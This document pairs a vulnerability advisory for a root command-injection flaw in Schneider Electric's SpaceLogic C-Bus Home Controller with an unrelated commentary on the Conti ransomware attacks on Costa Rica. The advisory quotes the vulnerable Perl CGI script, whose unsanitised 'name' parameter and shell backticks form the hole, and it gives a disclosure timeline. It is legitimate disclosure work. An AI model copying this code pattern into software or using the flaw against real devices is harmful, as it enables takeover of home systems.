SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants.

Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems... you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide!

The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.

Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls.

**Description**

The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam.

\--------------------------------------------------------------------------------

/www/delsnap.pl: 
----------------

01: #!/usr/bin/perl 
02: use IO::Handle; 
03: 
04: 
05: select(STDERR); 
06: $| = 1; 
07: select(STDOUT); 
08: $| = 1; 
09: 
10: #print "\r\n\r\n"; 
11: 
12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/'; 
13: use CGI; 
14: 
15: my $PROGNAME = "delsnap.pl"; 
16: 
17: my $cgi = new CGI(); 
18: 
19: my $name = $cgi->param('name'); 
20: if ($name eq "list") { 
21: print "\r\n\r\n"; 
22: print "DATA="; 
23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`; 
24: exit(0); 
25: } 
26: if ($name eq "deleteall") { 
27: print "\r\n\r\n"; 
28: print "DELETINGALL=TRUE&"; 
29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`; 
30: print "COMPLETED=true\n"; 
31: exit(0); 
32: } 
33: #print "name $name\n"; 
34: print "\r\n\r\n"; 
35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name"; 
36: 
37: unlink $filename or die "COMPLETED=false\n"; 
38: 
39: print "COMPLETED=true\n";

 
\--------------------------------------------------------------------------------

**Vendor**

Schneider Electric SE - https://www.se.com

**Affected Version**

SpaceLogic C-Bus Home Controller (5200WHC2) 
formerly known as C-Bus Wiser Home Controller MK2 
V1.31.460 and prior 
Firmware: 604

**Tested On**

Machine: OMAP3 Wiser2 Board 
CPU: ARMv7 revision 2 
GNU/Linux 2.6.37 (armv7l) 
BusyBox v1.22.1 
thttpd/2.25b 
Perl v5.20.0 
Clipsal 81 
Angstrom 2009.X-stable 
PICED 4.14.0.100 
lighttpd/1.7 
GCC 4.4.3 
NodeJS v10.15.3

**Vendor Status**

\[27.03.2022\] Vulnerability discovered. 
\[31.03.2022\] Reported the vulnerability to the vendor. 
\[31.03.2022\] Vendor receives PoC, starts analysis and creates SE-6334 (Remote Root Exploit). 
\[11.04.2022\] Asked vendor for confirmation and status update. 
\[11.04.2022\] Vendor is still analyzing the vulnerability. Will let us know once the case is confirmed. 
\[20.04.2022\] Asked vendor for confirmation and scheduled patch release date. 
\[21.04.2022\] Vendor is still analyzing. 
\[30.04.2022\] Asked vendor for status update. 
\[02.05.2022\] Vendor states that the product team has finalized their action plan and has provided a tentative fix release date of end of June. 
\[02.05.2022\] Replied to the vendor. 
\[02.05.2022\] The product team is working diligently on the fix. If there are any changes to the release date, we will let you know immediately. 
\[03.06.2022\] Asked vendor for status update. 
\[03.06.2022\] Vendor responds, tentative fix release date remains end of June. 
\[27.06.2022\] Asked vendor for status update. 
\[28.06.2022\] Vendor is finalizing the security notification and expecting to disclose on July 12th 2022. 
\[30.06.2022\] Vendor sends encrypted draft advisory for review. 
\[02.07.2022\] Sent our encrypted draft advisory for alignment of content. 
\[08.07.2022\] Vendor reviews the advisory and agrees that it is aligned with the contents. Provided advisory URL and asked for release date. 
\[10.07.2022\] Replied to the vendor with scheduled advisory release date. 
\[12.07.2022\] Vendor released advisory SEVD-2022-193-02. 
\[20.07.2022\] Coordinated public security advisory released.

**PoC**

SpaceLogic.ps1

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp 
\[2\] https://download.schneider-electric.com/files?p\_enDocType=Security+and+Safety+Notice&p\_File\_Name=SEVD-2022-193-02\_SpaceLogic-C-Bus-Home-Controller-Wiser\_MK2\_Security\_Notification.pdf 
\[3\] https://www.se.com/ww/en/work/support/cybersecurity/wall-of-thanks.jsp 
\[4\] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753 
\[5\] https://nvd.nist.gov/vuln/detail/CVE-2022-34753

**Changelog**

\[20.07.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk 
e-mail: lab@zeroscience.mk

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit

Aamir Lakhani, with FortiGuard Labs, answers the question; Why is the Conti ransomware gang targeting people and businesses in Costa Rica?

Aamir Lakhani, with FortiGuard Labs, answers the question; Why is the Conti ransomware gang targeting people and businesses in Costa Rica?

Any time conflict erupts, people tend to take sides, even when it comes to cybercrime. Since the beginning of the ongoing Russian-Ukrainian war, some bad actors have made their alliances known publicly.

The Conti Ransomware-as-a-Service (RaaS) group is one of the most notable – declaring in February that they were backing Russia and would use their arsenal accordingly.

Their latest target seems to be the entire country of Costa Rica, which expressed its opposition to the Russian invasion. This begs the question: Should other countries be concerned? Why is this happening now, and what does it portend?

**The rise of Conti**

The Conti ransomware group is behind many prominent attacks, including the one that took down the Irish healthcare service in May 2021. Conti was also ranked by the FBI (PDF) as the top ransomware variant targeting critical infrastructure in 2021. The bureau identified at least 16 attacks by Conti ransomware against U.S. healthcare and First Responder networks, including emergency medical services, law enforcement agencies and 9-1-1 dispatch centers last year.

Last year, Conti’s internal chat logs were leaked – essentially, their playbook was made public. And more internal records leaked earlier this year showed the group was essentially operating like a company. These documents – ironically leaked in retaliation for Conti’s pro-Russia stance – showed that the ransomware ring has a human resources department, offers bonuses and even names an employee of the month.

And since then, what we’re seeing and hearing seems to indicate that Conti is trying to overcome these reputational setbacks by setting out to prove they are legitimate, sophisticated and still very relevant. We’re seeing this in terms of how they recruit, too – going after other threat actors and holding, essentially, recruitment events not that different from what you might expect from big Silicon Valley companies (though obviously a bit more underground).

While we don’t think they’re a nation-state actor, they’ve certainly made their affiliation well-known and are acting accordingly. That said, the driving factor still always comes back down to money. and they’re trying to make sure they stay on top.

****The Evolution of Ransomware****

The attack on Costa Rica has cost the nation millions of dollars. Tax payments were disrupted and staff at the 27 affected government agencies had to revert to pen and paper as their computers remained useless. With this attack, there’s evidence that this is essentially an attempt by Conti to “rebrand” – with news coming not long after the attack that Conti was shutting down in its current form.

But the big takeaway here is – what do attacks like the one against an entire nation say about how ransomware is evolving? For one thing, while money is still obviously the driving factor, we’re seeing that notoriety and “fame-seeking” also plays a role. Conti has been direct in its desire to not only extort money but to overthrow the Costa Rican government – that’s a new wrinkle in ransomware that only adds to the attackers’ notoriety.

We’re also seeing attacks that seem primarily focused on destruction. FortiGuard Labs researchers recently uncovered a new variant of Chaos ransomware in which the attacker has no intention of providing a decryption tool or file instructions – it’s all about destroying whatever it can.

Bad actors are clearly trying to stoke fear about what could possibly happen. There is still the financial component of ransomware, but at the same time, they are trying to flex their muscles more. It’s quite possible that there are competing philosophical differences between the groups. But it’s definitely more about spreading fear so that companies will pay whatever attackers ask. As tensions rise, that can change daily.

What does this signify in terms of how malware and ransomware are evolving? We’re likely going to see much more destructive ransomware attacks with wiper malware, which will completely destroy data. We’re going to see more aggressive ransomware attacks using Wiper malware. What we’re seeing is that bad actors are now less afraid of using more sophisticated attacks – they’re no longer afraid to try those out – and, unfortunately, it’s going to be much harder to contain and detect them.

****Stay strong****

More recently, the Chaos ransomware variant has sided with Russia, leaving observers to wonder what this could mean from a cybersecurity standpoint. The implications for cyber proxy wars are huge, both for national governments and the profitable companies within their borders. Taking a stand could now unleash additional, digital consequences.

However, organizations don’t have to cower before ransom requests if they have the proper security strategy in place. This includes a comprehensive and integrated security mesh, current threat intelligence, a strong cyber hygiene program and top-notch employee training. Keep your ear to the ground and continue to execute on both advanced and basic security measures, and you’re likely to weather the ransomware storms.

**_Aamir Lakhani is cybersecurity researcher and practitioner at FortiGuard Labs_.**

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Tag

#pdf